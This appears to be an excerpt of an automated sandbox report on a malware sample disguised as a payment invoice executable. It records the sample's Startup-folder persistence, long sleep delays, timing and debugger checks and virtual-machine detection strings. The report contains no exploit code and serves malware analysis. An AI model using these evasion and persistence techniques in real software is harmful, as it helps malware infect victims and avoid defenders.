          Source: C:\Users\user\Desktop\Payment INV NO. 230203-1USD.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Payment INV NO. 230203-1USD.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Payment INV NO. 230203-1USD.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Payment INV NO. 230203-1USD.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Payment INV NO. 230203-1USD.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Payment INV NO. 230203-1USD.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Payment INV NO. 230203-1USD.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Payment INV NO. 230203-1USD.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Payment INV NO. 230203-1USD.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Payment INV NO. 230203-1USD.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Payment INV NO. 230203-1USD.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Payment INV NO. 230203-1USD.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Payment INV NO. 230203-1USD.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Payment INV NO. 230203-1USD.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Payment INV NO. 230203-1USD.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Payment INV NO. 230203-1USD.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Payment INV NO. 230203-1USD.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Payment INV NO. 230203-1USD.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Payment INV NO. 230203-1USD.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Payment INV NO. 230203-1USD.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Payment INV NO. 230203-1USD.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Payment INV NO. 230203-1USD.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Payment INV NO. 230203-1USD.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Payment INV NO. 230203-1USD.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Payment INV NO. 230203-1USD.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Payment INV NO. 230203-1USD.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Payment INV NO. 230203-1USD.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Payment INV NO. 230203-1USD.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Payment INV NO. 230203-1USD.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Payment INV NO. 230203-1USD.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Payment INV NO. 230203-1USD.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Payment INV NO. 230203-1USD.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Payment INV NO. 230203-1USD.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Payment INV NO. 230203-1USD.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Payment INV NO. 230203-1USD.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Payment INV NO. 230203-1USD.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Payment INV NO. 230203-1USD.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Payment INV NO. 230203-1USD.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Payment INV NO. 230203-1USD.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Payment INV NO. 230203-1USD.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Payment INV NO. 230203-1USD.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Payment INV NO. 230203-1USD.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Payment INV NO. 230203-1USD.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Payment INV NO. 230203-1USD.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Payment INV NO. 230203-1USD.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Payment INV NO. 230203-1USD.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Payment INV NO. 230203-1USD.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Payment INV NO. 230203-1USD.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Payment INV NO. 230203-1USD.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Payment INV NO. 230203-1USD.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Payment INV NO. 230203-1USD.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Payment INV NO. 230203-1USD.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Payment INV NO. 230203-1USD.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Payment INV NO. 230203-1USD.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Payment INV NO. 230203-1USD.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Payment INV NO. 230203-1USD.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Payment INV NO. 230203-1USD.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Payment INV NO. 230203-1USD.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Payment INV NO. 230203-1USD.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Payment INV NO. 230203-1USD.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Payment INV NO. 230203-1USD.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Payment INV NO. 230203-1USD.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Payment INV NO. 230203-1USD.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Payment INV NO. 230203-1USD.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Payment INV NO. 230203-1USD.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Payment INV NO. 230203-1USD.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Payment INV NO. 230203-1USD.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Payment INV NO. 230203-1USD.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Payment INV NO. 230203-1USD.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Payment INV NO. 230203-1USD.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Payment INV NO. 230203-1USD.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Payment INV NO. 230203-1USD.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Payment INV NO. 230203-1USD.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Payment INV NO. 230203-1USD.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Payment INV NO. 230203-1USD.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Payment INV NO. 230203-1USD.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Payment INV NO. 230203-1USD.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Payment INV NO. 230203-1USD.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Payment INV NO. 230203-1USD.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Payment INV NO. 230203-1USD.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\ipconfig.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\ipconfig.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\ipconfig.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\ipconfig.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\ipconfig.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Payment INV NO. 230203-1USD.exe TID: 4516Thread sleep time: -30000s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\Payment INV NO. 230203-1USD.exe TID: 4464Thread sleep time: -922337203685477s >= -30000sJump to behavior
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Payment INV NO. 230203-1USD.exe TID: 2452Thread sleep time: -922337203685477s >= -30000sJump to behavior
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Payment INV NO. 230203-1USD.exe TID: 764Thread sleep time: -30000s >= -30000sJump to behavior
          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
          Source: C:\Users\user\Desktop\Payment INV NO. 230203-1USD.exeCode function: 4_2_017C6B90 rdtsc 4_2_017C6B90
          Source: C:\Users\user\Desktop\Payment INV NO. 230203-1USD.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Payment INV NO. 230203-1USD.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Users\user\Desktop\Payment INV NO. 230203-1USD.exeAPI coverage: 2.0 %
          Source: C:\Users\user\Desktop\Payment INV NO. 230203-1USD.exeProcess information queried: ProcessInformationJump to behavior
          Source: C:\Users\user\Desktop\Payment INV NO. 230203-1USD.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Payment INV NO. 230203-1USD.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: explorer.exe, 00000005.00000000.360160999.0000000008631000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
          Source: explorer.exe, 00000005.00000002.590110012.00000000086E7000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}i
          Source: explorer.exe, 00000005.00000002.590110012.00000000086E7000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000005.00000002.583914019.00000000043B0000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000005.00000002.594221335.000000000ECDA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.533737470.000000000ECDA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.551660645.000000000ECDA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.590110012.0000000008631000.00000004.00000001.00020000.00000000.sdmp, ipconfig.exe, 00000008.00000002.584488050.0000000007730000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
          Source: explorer.exe, 00000005.00000002.590110012.00000000086E7000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000
          Source: explorer.exe, 00000005.00000000.360160999.0000000008631000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000
          Source: C:\Users\user\Desktop\Payment INV NO. 230203-1USD.exeCode function: 4_2_017C6B90 rdtsc 4_2_017C6B90
          Source: C:\Users\user\Desktop\Payment INV NO. 230203-1USD.exeProcess token adjusted: DebugJump to behavior
          Source: C:\Users\user\Desktop\Payment INV NO. 230203-1USD.exeProcess token adjusted: DebugJump to behavior
          Source: C:\Users\user\Desktop\Payment INV NO. 230203-1USD.exeCode function: 4_2_0179B171 mov eax, dword ptr fs:[00000030h]4_2_0179B171
          Source: C:\Users\user\Desktop\Payment INV NO. 230203-1USD.exeCode function: 4_2_0179B171 mov eax, dword ptr fs:[00000030h]4_2_0179B171
          Source: C:\Users\user\Desktop\Payment INV NO. 230203-1USD.exeCode function: 4_2_017B7D70 mov eax, dword ptr fs:[00000030h]4_2_017B7D70
          Source: C:\Users\user\Desktop\Payment INV NO. 230203-1USD.exeCode function: 4_2_017B7D70 mov eax, dword ptr fs:[00000030h]4_2_017B7D70
          Source: C:\Users\user\Desktop\Payment INV NO. 230203-1USD.exeCode function: 4_2_017B7D70 mov eax, dword ptr fs:[00000030h]4_2_017B7D70
          Source: C:\Users\user\Desktop\Payment INV NO. 230203-1USD.exeCode function: 4_2_017B7D70 mov eax, dword ptr fs:[00000030h]4_2_017B7D70
          Source: C:\Users\user\Desktop\Payment INV NO. 230203-1USD.exeCode function: 4_2_017B7D70 mov ecx, dword ptr fs:[00000030h]4_2_017B7D70
          Source: C:\Users\user\Desktop\Payment INV NO. 230203-1USD.exeCode function: 4_2_017B7D70 mov ecx, dword ptr fs:[00000030h]4_2_017B7D70
          Source: C:\Users\user\Desktop\Payment INV NO. 230203-1USD.exeCode function: 4_2_017B7D70 mov eax, dword ptr fs:[00000030h]4_2_017B7D70
          Source: C:\Users\user\Desktop\Payment INV NO. 230203-1USD.exeCode function: 4_2_017B7D70 mov ecx, dword ptr fs:[00000030h]4_2_017B7D70
          Source: C:\Users\user\Desktop\Payment INV NO. 230203-1USD.exeCode function: 4_2_017B7D70 mov ecx, dword ptr fs:[00000030h]4_2_017B7D70
          Source: C:\Users\user\Desktop\Payment INV NO. 230203-1USD.exeCode function: 4_2_017B7D70 mov eax, dword ptr fs:[00000030h]4_2_017B7D70
          Source: C:\Users\user\Desktop\Payment INV NO. 230203-1USD.exeCode function: 4_2_017B7D70 mov ecx, dword ptr fs:[00000030h]4_2_017B7D70
          Source: C:\Users\user\Desktop\Payment INV NO. 230203-1USD.exeCode function: 4_2_017B7D70 mov ecx, dword ptr fs:[00000030h]4_2_017B7D70
          Source: C:\Users\user\Desktop\Payment INV NO. 230203-1USD.exeCode function: 4_2_017B7D70 mov eax, dword ptr fs:[00000030h]4_2_017B7D70
          Source: C:\Users\user\Desktop\Payment INV NO. 230203-1USD.exeCode function: 4_2_017B7D70 mov eax, dword ptr fs:[00000030h]4_2_017B7D70
          Source: C:\Users\user\Desktop\Payment INV NO. 230203-1USD.exeCode function: 4_2_017B7D70 mov eax, dword ptr fs:[00000030h]4_2_017B7D70
          Source: C:\Users\user\Desktop\Payment INV NO. 230203-1USD.exeCode function: 4_2_017B7D70 mov eax, dword ptr fs:[00000030h]4_2_017B7D70
          Source: C:\Users\user\Desktop\Payment INV NO. 230203-1USD.exeCode function: 4_2_017B7D70 mov eax, dword ptr fs:[00000030h]4_2_017B7D70
          Source: C:\Users\user\Desktop\Payment INV NO. 230203-1USD.exeCode function: 4_2_017B7D70 mov eax, dword ptr fs:[00000030h]4_2_017B7D70
          Source: C:\Users\user\Desktop\Payment INV NO. 230203-1USD.exeCode function: 4_2_017B7D70 mov eax, dword ptr fs:[00000030h]4_2_017B7D70
          Source: C:\Users\user\Desktop\Payment INV NO. 230203-1USD.exeCode function: 4_2_017B7D70 mov eax, dword ptr fs:[00000030h]4_2_017B7D70
          Source: C:\Users\user\Desktop\Payment INV NO. 230203-1USD.exeCode function: 4_2_017BC577 mov eax, dword ptr fs:[00000030h]4_2_017BC577
          Source: C:\Users\user\Desktop\Payment INV NO. 230203-1USD.exeCode function: 4_2_017BC577 mov eax, dword ptr fs:[00000030h]4_2_017BC577
          Source: C:\Users\user\Desktop\Payment INV NO. 230203-1USD.exeCode function: 4_2_017B8D76 mov eax, dword ptr fs:[00000030h]4_2_017B8D76
          Source: C:\Users\user\Desktop\Payment INV NO. 230203-1USD.exeCode function: 4_2_017B8D76 mov eax, dword ptr fs:[00000030h]4_2_017B8D76
          Source: C:\Users\user\Desktop\Payment INV NO. 230203-1USD.exeCode function: 4_2_017B8D76 mov eax, dword ptr fs:[00000030h]4_2_017B8D76
          Source: C:\Users\user\Desktop\Payment INV NO. 230203-1USD.exeCode function: 4_2_017B8D76 mov eax, dword ptr fs:[00000030h]4_2_017B8D76
          Source: C:\Users\user\Desktop\Payment INV NO. 230203-1USD.exeCode function: 4_2_017B8D76 mov eax, dword ptr fs:[00000030h]4_2_017B8D76
          Source: C:\Users\user\Desktop\Payment INV NO. 230203-1USD.exeCode function: 4_2_0179C962 mov eax, dword ptr fs:[00000030h]4_2_0179C962
          Source: C:\Users\user\Desktop\Payment INV NO. 230203-1USD.exeCode function: 4_2_0179395E mov eax, dword ptr fs:[00000030h]4_2_0179395E
          Source: C:\Users\user\Desktop\Payment INV NO. 230203-1USD.exeCode function: 4_2_0179395E mov eax, dword ptr fs:[00000030h]4_2_0179395E
          Source: C:\Users\user\Desktop\Payment INV NO. 230203-1USD.exeCode function: 4_2_017B7D50 mov eax, dword ptr fs:[00000030h]4_2_017B7D50
          Source: C:\Users\user\Desktop\Payment INV NO. 230203-1USD.exeCode function: 4_2_0179354C mov eax, dword ptr fs:[00000030h]4_2_0179354C
          Source: C:\Users\user\Desktop\Payment INV NO. 230203-1USD.exeCode function: 4_2_0179354C mov eax, dword ptr fs:[00000030h]4_2_0179354C
          Source: C:\Users\user\Desktop\Payment INV NO. 230203-1USD.exeCode function: 4_2_017D3D43 mov eax, dword ptr fs:[00000030h]4_2_017D3D43
          Source: C:\Users\user\Desktop\Payment INV NO. 230203-1USD.exeCode function: 4_2_017BB944 mov eax, dword ptr fs:[00000030h]4_2_017BB944
          Source: C:\Users\user\Desktop\Payment INV NO. 230203-1USD.exeCode function: 4_2_017BB944 mov eax, dword ptr fs:[00000030h]4_2_017BB944
          Source: C:\Users\user\Desktop\Payment INV NO. 230203-1USD.exeCode function: 4_2_01793138 mov ecx, dword ptr fs:[00000030h]4_2_01793138
          Source: C:\Users\user\Desktop\Payment INV NO. 230203-1USD.exeCode function: 4_2_017C513A mov eax, dword ptr fs:[00000030h]4_2_017C513A
          Source: C:\Users\user\Desktop\Payment INV NO. 230203-1USD.exeCode function: 4_2_017C513A mov eax, dword ptr fs:[00000030h]4_2_017C513A
          Source: C:\Users\user\Desktop\Payment INV NO. 230203-1USD.exeCode function: 4_2_017C4D3B mov eax, dword ptr fs:[00000030h]4_2_017C4D3B
          Source: C:\Users\user\Desktop\Payment INV NO. 230203-1USD.exeCode function: 4_2_017C4D3B mov eax, dword ptr fs:[00000030h]4_2_017C4D3B
          Source: C:\Users\user\Desktop\Payment INV NO. 230203-1USD.exeCode function: 4_2_017C4D3B mov eax, dword ptr fs:[00000030h]4_2_017C4D3B
          Source: C:\Users\user\Desktop\Payment INV NO. 230203-1USD.exeCode function: 4_2_0179AD30 mov eax, dword ptr fs:[00000030h]4_2_0179AD30
          Source: C:\Users\user\Desktop\Payment INV NO. 230203-1USD.exeCode function: 4_2_017B7D30 mov eax, dword ptr fs:[00000030h]4_2_017B7D30
          Source: C:\Users\user\Desktop\Payment INV NO. 230203-1USD.exeCode function: 4_2_017A3D34 mov eax, dword ptr fs:[00000030h]4_2_017A3D34
          Source: C:\Users\user\Desktop\Payment INV NO. 230203-1USD.exeCode function: 4_2_017A3D34 mov eax, dword ptr fs:[00000030h]4_2_017A3D34
          Source: C:\Users\user\Desktop\Payment INV NO. 230203-1USD.exeCode function: 4_2_017A3D34 mov eax, dword ptr fs:[00000030h]4_2_017A3D34
          Source: C:\Users\user\Desktop\Payment INV NO. 230203-1USD.exeCode function: 4_2_017A3D34 mov eax, dword ptr fs:[00000030h]4_2_017A3D34
          Source: C:\Users\user\Desktop\Payment INV NO. 230203-1USD.exeCode function: 4_2_017A3D34 mov eax, dword ptr fs:[00000030h]4_2_017A3D34
          Source: C:\Users\user\Desktop\Payment INV NO. 230203-1USD.exeCode function: 4_2_017A3D34 mov eax, dword ptr fs:[00000030h]4_2_017A3D34
          Source: C:\Users\user\Desktop\Payment INV NO. 230203-1USD.exeCode function: 4_2_017A3D34 mov eax, dword ptr fs:[00000030h]4_2_017A3D34
          Source: C:\Users\user\Desktop\Payment INV NO. 230203-1USD.exeCode function: 4_2_017A3D34 mov eax, dword ptr fs:[00000030h]4_2_017A3D34
          Source: C:\Users\user\Desktop\Payment INV NO. 230203-1USD.exeCode function: 4_2_017A3D34 mov eax, dword ptr fs:[00000030h]4_2_017A3D34
          Source: C:\Users\user\Desktop\Payment INV NO. 230203-1USD.exeCode function: 4_2_017A3D34 mov eax, dword ptr fs:[00000030h]4_2_017A3D34
          Source: C:\Users\user\Desktop\Payment INV NO. 230203-1USD.exeCode function: 4_2_017A3D34 mov eax, dword ptr fs:[00000030h]4_2_017A3D34
          Source: C:\Users\user\Desktop\Payment INV NO. 230203-1USD.exeCode function: 4_2_017A3D34 mov eax, dword ptr fs:[00000030h]4_2_017A3D34
          Source: C:\Users\user\Desktop\Payment INV NO. 230203-1USD.exeCode function: 4_2_017A3D34 mov eax, dword ptr fs:[00000030h]4_2_017A3D34
          Source: C:\Users\user\Desktop\Payment INV NO. 230203-1USD.exeCode function: 4_2_017B4120 mov eax, dword ptr fs:[00000030h]4_2_017B4120
          Source: C:\Users\user\Desktop\Payment INV NO. 230203-1USD.exeCode function: 4_2_017B4120 mov eax, dword ptr fs:[00000030h]4_2_017B4120
          Source: C:\Users\user\Desktop\Payment INV NO. 230203-1USD.exeCode function: 4_2_017B4120 mov eax, dword ptr fs:[00000030h]4_2_017B4120
          Source: C:\Users\user\Desktop\Payment INV NO. 230203-1USD.exeCode function: 4_2_017B4120 mov eax, dword ptr fs:[00000030h]4_2_017B4120
          Source: C:\Users\user\Desktop\Payment INV NO. 230203-1USD.exeCode function: 4_2_017B4120 mov ecx, dword ptr fs:[00000030h]4_2_017B4120
          Source: C:\Users\user\Desktop\Payment INV NO. 230203-1USD.exeCode function: 4_2_017C1520 mov eax, dword ptr fs:[00000030h]4_2_017C1520
          Source: C:\Users\user\Desktop\Payment INV NO. 230203-1USD.exeCode function: 4_2_017C1520 mov eax, dword ptr fs:[00000030h]4_2_017C1520
          Source: C:\Users\user\Desktop\Payment INV NO. 230203-1USD.exeCode function: 4_2_017C1520 mov eax, dword ptr fs:[00000030h]4_2_017C1520
          Source: C:\Users\user\Desktop\Payment INV NO. 230203-1USD.exeCode function: 4_2_017C1520 mov eax, dword ptr fs:[00000030h]4_2_017C1520
          Source: C:\Users\user\Desktop\Payment INV NO. 230203-1USD.exeCode function: 4_2_017C1520 mov eax, dword ptr fs:[00000030h]4_2_017C1520
          Source: C:\Users\user\Desktop\Payment INV NO. 230203-1USD.exeCode function: 4_2_0179F51D mov eax, dword ptr fs:[00000030h]4_2_0179F51D
          Source: C:\Users\user\Desktop\Payment INV NO. 230203-1USD.exeCode function: 4_2_01799100 mov eax, dword ptr fs:[00000030h]4_2_01799100
          Source: C:\Users\user\Desktop\Payment INV NO. 230203-1USD.exeCode function: 4_2_01799100 mov eax, dword ptr fs:[00000030h]4_2_01799100
          Source: C:\Users\user\Desktop\Payment INV NO. 230203-1USD.exeCode function: 4_2_01799100 mov eax, dword ptr fs:[00000030h]4_2_01799100
          Source: C:\Users\user\Desktop\Payment INV NO. 230203-1USD.exeCode function: 4_2_017A0100 mov eax, dword ptr fs:[00000030h]4_2_017A0100
          Source: C:\Users\user\Desktop\Payment INV NO. 230203-1USD.exeCode function: 4_2_017A0100 mov eax, dword ptr fs:[00000030h]4_2_017A0100
          Source: C:\Users\user\Desktop\Payment INV NO. 230203-1USD.exeCode function: 4_2_017A0100 mov eax, dword ptr fs:[00000030h]4_2_017A0100
          Source: C:\Users\user\Desktop\Payment INV NO. 230203-1USD.exeCode function: 4_2_017995F0 mov eax, dword ptr fs:[00000030h]4_2_017995F0
          Source: C:\Users\user\Desktop\Payment INV NO. 230203-1USD.exeCode function: 4_2_017995F0 mov ecx, dword ptr fs:[00000030h]4_2_017995F0
          Source: C:\Users\user\Desktop\Payment INV NO. 230203-1USD.exeCode function: 4_2_0179E9ED mov eax, dword ptr fs:[00000030h]4_2_0179E9ED
          Source: C:\Users\user\Desktop\Payment INV NO. 230203-1USD.exeCode function: 4_2_0179B1E1 mov eax, dword ptr fs:[00000030h]4_2_0179B1E1
          Source: C:\Users\user\Desktop\Payment INV NO. 230203-1USD.exeCode function: 4_2_0179B1E1 mov eax, dword ptr fs:[00000030h]4_2_0179B1E1
